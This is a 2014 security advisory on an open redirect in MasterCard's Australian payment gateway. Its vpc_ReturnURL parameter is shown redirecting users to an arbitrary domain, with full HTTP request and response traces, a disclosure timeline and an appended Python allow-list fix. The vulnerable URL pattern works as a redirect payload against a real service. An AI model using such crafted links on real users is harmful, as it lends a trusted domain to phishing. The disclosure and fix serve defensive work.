MasterCard Open Redirect

2014.07.29
Credit: Anastasios
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-601

=======================================================================
MasterCard - Open Redirect
=======================================================================

Affected Domain : mastercard.com.au
Local/Remote    : Remote
Severity        : Very Low
Vulnerable URL  : https://migs.mastercard.com.au/vpcpay?vpc_ReturnURL=http://<any_domain>
Discovered by   : Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]

[Summary]

The vpc_ReturnURL parameter is not properly verified before being used. This can be exploited to redirect a user to an arbitrary website, e.g. when a user clicks a specially crafted link to the affected script hosted on a trusted domain.

[Vulnerability Details]

GET Request:
------------
GET https://migs.mastercard.com.au/vpcpay?vpc_ReturnURL=http://www.google.com HTTP/1.1
Host: migs.mastercard.com.au
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

GET Response:
-------------
HTTP/1.1 302 Found
Date: Mon, 23 May 2014 12:26:51 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa TA1a OUR BUS IND UNI COM NAV INT"
Set-Cookie: PAY4939831625825013779=PAY8CA6985107791A1B572838CBB73CF5D3; Path=/; Secure
Expires: Sun, 15 Jun 1990 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: PS_ENCODING_COOKIE=iso-8859-1; Expires=Mon, 23-Jun-2014 12:56:51 GMT; Secure
Accept-Charset: iso-8859-1, unicode-1-1;q=0.8
Pragma: no-cache
Location: https://migs.mastercard.com.au/vpcpay?o=pt&DOID=AA93D612C3210464C0F03BF66D5DCDCE&paymentId=4999831621825113478
Content-Language: en
Content-Length: 0
Keep-Alive: timeout=15, max=79
Connection: Keep-Alive
Content-Type: text/html;charset=iso-8859-1

Follow up GET Request I:
------------------------
GET https://migs.mastercard.com.au/vpcpay?o=pt&DOID=AA93D612C3210464C0F03BF66D5DCDCE&paymentId=4999831621825113478 HTTP/1.1
Host: migs.mastercard.com.au
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

GET follow up Response I:
-------------------------
HTTP/1.1 302 Found
Date: Mon, 23 May 2014 12:27:10 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa TA1a OUR BUS IND UNI COM NAV INT"
Expires: Sun, 15 Jun 1990 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: PS_ENCODING_COOKIE=iso-8859-1; Expires=Mon, 23-Jun-2014 12:57:10 GMT; Secure
Accept-Charset: iso-8859-1, unicode-1-1;q=0.8
Pragma: no-cache
Location: http://www.google.com?vpc_Amount=0&vpc_BatchNo=0&vpc_Locale=en&vpc_Message=Required+field+vpc_Merchant+was+not+present+in+the+request&vpc_TransactionNo=0&vpc_TxnResponseCode=7
Content-Language: en
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=iso-8859-1

GET follow up Request II:
-------------------------
GET http://www.google.com/?vpc_Amount=0&vpc_BatchNo=0&vpc_Locale=en&vpc_Message=Required+field+vpc_Merchant+was+not+present+in+the+request&vpc_TransactionNo=0&vpc_TxnResponseCode=7 HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

GET follow up Response II:
--------------------------
HTTP/1.1 302 Found
Location: http://www.google.com/?gws_rd=cr&ei=QR2oU9PfGYf-ygO6yIC4Dg
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 23 May 2014 12:27:41 GMT
Server: gws
Content-Length: 258
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Alternate-Protocol: 80:quic

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.google.com/?gws_rd=cr&amp;ei=QR2oU9PfGYf-ygO6yIC4Dg">here</A>.
</BODY></HTML>

[Time-line]

23/06/2014 - Advisory created
23/06/2014 - Mastercard notified: no response
25/06/2014 - Vendor contacted again - different department: no response
08/07/2014 - Re-contacted both departments: no response
27/07/2014 - Advisory published
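The exchange above shows the gateway copying vpc_ReturnURL straight into the second 302 Location header, with the vpc_* result fields appended. The following added example (not code from the advisory or from MasterCard's gateway) models the standard fix for a payment return URL: the gateway only redirects to a destination the merchant registered in advance, and anything else falls back to a page on the gateway's own host. The merchant registry, the fallback page and the function names are assumptions.

```python
"""Allow-list check for a payment-gateway return URL (constructed defensive example)."""
from urllib.parse import urlsplit, urlunsplit, parse_qsl, urlencode

# Assumed gateway-hosted error page used whenever the supplied return URL is rejected.
FALLBACK = "https://migs.mastercard.com.au/vpcpay?o=error"

# Hypothetical per-merchant registry: merchant id -> return URLs registered out of band.
REGISTERED_RETURN_URLS = {
    "TESTMERCHANT": ["https://shop.example.com/checkout/return"],
}

def _normalize(url):
    """Return (scheme, host, path) for comparison, or None if the URL is not an
    acceptable https URL (malformed, has userinfo, has an explicit port, no host)."""
    try:
        parts = urlsplit(url)
        # 'https://trusted@evil' must not be mistaken for 'trusted': reject userinfo.
        if parts.username is not None or parts.port is not None:
            return None
    except ValueError:
        return None
    if parts.scheme.lower() != "https" or not parts.hostname:
        return None
    return (parts.scheme.lower(), parts.hostname.lower(), parts.path or "/")

def safe_return_url(merchant_id, supplied_url):
    """Return supplied_url only if its scheme, host and path exactly match a URL
    registered for this merchant; otherwise return the gateway's own fallback page.
    The merchant's own query string (e.g. an order id) is allowed through."""
    supplied = _normalize(supplied_url)
    if supplied is None:
        return FALLBACK
    for registered in REGISTERED_RETURN_URLS.get(merchant_id, []):
        if _normalize(registered) == supplied:
            return supplied_url
    return FALLBACK

def build_redirect(merchant_id, supplied_url, result_fields):
    """Build the Location value: validated return URL plus the vpc_* result fields."""
    base = safe_return_url(merchant_id, supplied_url)
    parts = urlsplit(base)
    query = parse_qsl(parts.query, keep_blank_values=True) + list(result_fields.items())
    return urlunsplit((parts.scheme, parts.netloc, parts.path, urlencode(query), ""))
```

Matching on scheme, host and path rather than on a host prefix or substring is what keeps the check from being satisfied by a look-alike domain.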

